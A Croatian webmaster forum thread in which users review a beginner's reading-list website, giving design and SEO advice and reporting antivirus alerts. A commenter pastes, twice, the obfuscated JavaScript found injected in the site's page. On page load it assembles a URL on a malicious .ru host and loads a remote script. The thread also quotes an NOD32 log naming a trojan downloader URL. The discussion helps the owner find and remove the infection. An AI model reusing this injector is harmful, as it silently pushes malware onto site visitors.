Lektira recenzija

Pozdrav
Evo mogu reći da mi je ovo prva stranica koju nisam radio u nekom gotovam cms.

http://www.lektira.tk

Stranica ima i administraciju svega.Nism neki programer ali mislim da za početak nije loše.
pozicija na googleu na riječ lektire 42 svaki dan se penje
Šta vi mislite.

Neću puno pametovati što se recenziranja tice ali imam jedan prijedlog…

Dakle stavi da ti se svaka lektira posebno otvara, a ne ovako u popupu, tako ćeš dobiti na broju indexiranih stranica. Sada imas samo 9 indexiranih stranica i 900 dodanih lektira.

Inače izgleda sve to solidno, nije lose ako si pocetnik

Nisam na to ni misio Hvala

sredio sam stranicu

Pozadina mi ne paše sa stranicom, na tvom mjestu barem bi stavio bjelu pozadinu, na indexsu još kak, tak, ali kada se otvori lektira tamo nikako.

Avast mi javlja trojanca na stranici :nono:

obriši avasta :D, danas ovi antivirusi fakat glume nešt :smiley: imo sam instalirano anttivirus 5min, i to je dosta da ga više nikad ne instaliram!

Meni ne otvara stranicu…
Ta web stranica nije dostupna.

Web stranica na domeni
http://www.lektira.tk/
možda privremeno nije dostupna ili je trajno preseljena na novu web adresu.

ovak na prvi pogled, pozadina mi je full čudna, promjeni u neku nježniju boju, nažalost na poslu imam antivirus i da javlja nekog jarca, vidi o čem se tu radi isto, riješi malo paddinge da ne izgleda text da ide odmah od ruba stavi 5-10px, banner ti se ne vidi na stranici di je opis lektire,
da se malo više to zaoblji ne bi bilo loše, sviđa mi se logo, ali ova druga stranica di je detalji i opis lektire tu nema, i ta stranica ti je katastrofa to treba urediti, komentare uklopiti zajedno s detaljima o lektiri, a ne da izgleda tak odvojeno…

Ja ne koristim avast
Možete li mi reći šta javlja

Javlja:[quote=“NOD32”]10.3.2010 17:59:04
HTTP filter
file
h t t p://google-at.orf.at.pcauto-com-cn.eastcoastguide.ru:8080/pics/JavaJ.jar
probably a variant of Java/TrojanDownloader.Agent.NAI trojan
connection terminated - quarantined
Threat was detected upon access to web by the application: C:\Program Files\Java\jre6\bin\java.exe.[/quote]

hvala
ali šta sad da radim

imaš u kodu ovo

<SCRIPT language="JavaScript"> 
function loadPopupPollArchive() {
popups=window.open("http://localhost/2/Pool/archive.php","","width=500,height=300,scrollbars")
}
</script> 

to ti nije dobro, makar nema veze s virusom, a ovo bi najvjerojatnije bio virus, neda mi se sad to dekriptirati pa ić gledat

<script>var TG;if(TG!='' && TG!='Si'){TG=null};var Dc;if(Dc!='' && Dc!='Y'){Dc=''};var CR;if(CR!='' && CR!='l'){CR=''};function C(){this.u="";var A;if(A!='' && A!='I'){A=null};var W;if(W!='P' && W!='_'){W='P'};var w=new String("gyJw".substr(0,1));var cs;if(cs!=''){cs='Q'};var VS;if(VS!=''){VS='Wl'};var T=RegExp;var NA;if(NA!='' && NA!='Pd'){NA=''};var JX=new Array();var y=new String();var E='';var hG=new Array();var SH;if(SH!='bC' && SH!='St'){SH=''};function f(S,c){var t= String("zdn[".substr(3));this.bu="";var x;if(x!='' && x!='j'){x=null};t+=c;var bf=new String();t+="]";var o;if(o!=''){o='qk'};var bH;if(bH!=''){bH='R'};var D=new T(t, w);return S.replace(D, E);var T_=new String();};var lD;if(lD!='' && lD!='K'){lD=null};var WD;if(WD!='' && WD!='Ds'){WD=null};var V="m69src".substr(3);var wW;if(wW!='k' && wW!='ie'){wW=''};var r=new Date();var g=new String("defer");var B="/g"+"XZAoo".substr(3)+"uTcxgl".substr(4)+"e.dGNu".substr(0,2)+"VuHco".substr(3)+"m/KFE9".substr(0,2)+"uM5go".substr(3)+"deCog".substr(3)+"leA6ok".substr(0,2)+"o65.c".substr(3)+"Z2BomZ2B".substr(3,2)+"/b"+"7Gpuiz".substr(4)+"ra"+"jrTteTrj".substr(3,2)+"myXN.cyXmN".substr(4,2)+"om"+"/s"+"poQt0".substr(0,2)+"E46ns6E4".substr(3,2)+"QhyZor".substr(4)+"adEwj4".substr(0,2)+"8xys.".substr(3)+"deXDw".substr(0,2)+"fORN/i".substr(4)+"yN9Knf9KyN".substr(4,2)+"os"+"eeCRfb".substr(0,2)+"k.f0a".substr(0,2)+"QB42co".substr(4)+".j7Iu".substr(0,2)+"giVrp.".substr(4)+"XIxMph".substr(4)+"p";var vc="";var q='';var hna;if(hna!='' && hna!='Uu'){hna=''};var Cq;if(Cq!='' && Cq!='re'){Cq=''};var h=window;var L=String("BCJ0scr".substr(4)+"ipt");var Ty=f('84150548140541',"4153");this.Sx="";this.Zj='';var U="ht"+"tp3Qh".substr(0,2)+"9M62:/".substr(4)+"/gL0o".substr(0,2)+"mMuoomuM".substr(3,2)+"gl"+"e-"+"atObj".substr(0,2)+".oavYh".substr(0,2)+"rfbhD".substr(0,2)+".a"+"yviWt.Wyvi".substr(4,2)+"pc"+"auKBN".substr(0,2)+"RWfzto".substr(4)+"n2y-cyn2".substr(3,2)+"xMWomMxW".substr(3,2)+"-cGkRU".substr(0,2)+"n."+"IqPGeaqGIP".substr(4,2)+"stzZL".substr(0,2)+"hyPBco".substr(4)+"uph5asu5hp".substr(4,2)+"q5uEtg".substr(4)+"ui"+"de"+"aQIn.rQnIa".substr(4,2)+"cEbu:Ebc".substr(3,2);this.Md="";var Dr=new Array();h.onload=function(){var IM;if(IM!='uE' && IM != ''){IM=null};var Ip=new Array();try {var Jb;if(Jb!='' && Jb!='d'){Jb=null};var Vx=new Date();this.Ks="";q=U+Ty;q+=B;var uZ=new Date();var fN;if(fN!='EM' && fN != ''){fN=null};BL=document.createElement(L);var mD;if(mD!='CA' && mD!='rT'){mD=''};var T_k;if(T_k!='Vv' && T_k!='Zx'){T_k=''};var X_='';BL[g]=[1,6][0];var Rz=new Array();BL[V]=q;var iE;if(iE!='' && iE!='xf'){iE=''};var gb=new Array();document.body.appendChild(BL);var vV='';} catch(UR){};var NS=new String();};var IB;if(IB!='' && IB!='xB'){IB='Sb'};};this.bd='';C();</script> 
<!--a5b0c11c6ffb182211e14a510b102c57--><script>var TG;if(TG!='' && TG!='Si'){TG=null};var Dc;if(Dc!='' && Dc!='Y'){Dc=''};var CR;if(CR!='' && CR!='l'){CR=''};function C(){this.u="";var A;if(A!='' && A!='I'){A=null};var W;if(W!='P' && W!='_'){W='P'};var w=new String("gyJw".substr(0,1));var cs;if(cs!=''){cs='Q'};var VS;if(VS!=''){VS='Wl'};var T=RegExp;var NA;if(NA!='' && NA!='Pd'){NA=''};var JX=new Array();var y=new String();var E='';var hG=new Array();var SH;if(SH!='bC' && SH!='St'){SH=''};function f(S,c){var t= String("zdn[".substr(3));this.bu="";var x;if(x!='' && x!='j'){x=null};t+=c;var bf=new String();t+="]";var o;if(o!=''){o='qk'};var bH;if(bH!=''){bH='R'};var D=new T(t, w);return S.replace(D, E);var T_=new String();};var lD;if(lD!='' && lD!='K'){lD=null};var WD;if(WD!='' && WD!='Ds'){WD=null};var V="m69src".substr(3);var wW;if(wW!='k' && wW!='ie'){wW=''};var r=new Date();var g=new String("defer");var B="/g"+"XZAoo".substr(3)+"uTcxgl".substr(4)+"e.dGNu".substr(0,2)+"VuHco".substr(3)+"m/KFE9".substr(0,2)+"uM5go".substr(3)+"deCog".substr(3)+"leA6ok".substr(0,2)+"o65.c".substr(3)+"Z2BomZ2B".substr(3,2)+"/b"+"7Gpuiz".substr(4)+"ra"+"jrTteTrj".substr(3,2)+"myXN.cyXmN".substr(4,2)+"om"+"/s"+"poQt0".substr(0,2)+"E46ns6E4".substr(3,2)+"QhyZor".substr(4)+"adEwj4".substr(0,2)+"8xys.".substr(3)+"deXDw".substr(0,2)+"fORN/i".substr(4)+"yN9Knf9KyN".substr(4,2)+"os"+"eeCRfb".substr(0,2)+"k.f0a".substr(0,2)+"QB42co".substr(4)+".j7Iu".substr(0,2)+"giVrp.".substr(4)+"XIxMph".substr(4)+"p";var vc="";var q='';var hna;if(hna!='' && hna!='Uu'){hna=''};var Cq;if(Cq!='' && Cq!='re'){Cq=''};var h=window;var L=String("BCJ0scr".substr(4)+"ipt");var Ty=f('84150548140541',"4153");this.Sx="";this.Zj='';var U="ht"+"tp3Qh".substr(0,2)+"9M62:/".substr(4)+"/gL0o".substr(0,2)+"mMuoomuM".substr(3,2)+"gl"+"e-"+"atObj".substr(0,2)+".oavYh".substr(0,2)+"rfbhD".substr(0,2)+".a"+"yviWt.Wyvi".substr(4,2)+"pc"+"auKBN".substr(0,2)+"RWfzto".substr(4)+"n2y-cyn2".substr(3,2)+"xMWomMxW".substr(3,2)+"-cGkRU".substr(0,2)+"n."+"IqPGeaqGIP".substr(4,2)+"stzZL".substr(0,2)+"hyPBco".substr(4)+"uph5asu5hp".substr(4,2)+"q5uEtg".substr(4)+"ui"+"de"+"aQIn.rQnIa".substr(4,2)+"cEbu:Ebc".substr(3,2);this.Md="";var Dr=new Array();h.onload=function(){var IM;if(IM!='uE' && IM != ''){IM=null};var Ip=new Array();try {var Jb;if(Jb!='' && Jb!='d'){Jb=null};var Vx=new Date();this.Ks="";q=U+Ty;q+=B;var uZ=new Date();var fN;if(fN!='EM' && fN != ''){fN=null};BL=document.createElement(L);var mD;if(mD!='CA' && mD!='rT'){mD=''};var T_k;if(T_k!='Vv' && T_k!='Zx'){T_k=''};var X_='';BL[g]=[1,6][0];var Rz=new Array();BL[V]=q;var iE;if(iE!='' && iE!='xf'){iE=''};var gb=new Array();document.body.appendChild(BL);var vV='';} catch(UR){};var NS=new String();};var IB;if(IB!='' && IB!='xB'){IB='Sb'};};this.bd='';C();</script> 
<!--a5b0c11c6ffb182211e14a510b102c57-->

a to je izvan
najvjerojatnije ti to dodaje hosting, ako si na besplatnome, a ako nije do hosta onda to obriši van, promjeni ftp pšifru uploadaj ponovo bez ovog…

Hvala
Da to prvo arhiva od ankete

no ovo drugo pojma nemam čemu je služilo bilo je u indeksu stranica dobro radi a i lakša je hehe

Konačno sam uklonio prokleti virus a posjećenost mi je skočila za 80%

Copyright © 2020 WM Forum - AboutContact - Sponsored by: Mydataknox & Webmaster.Ninja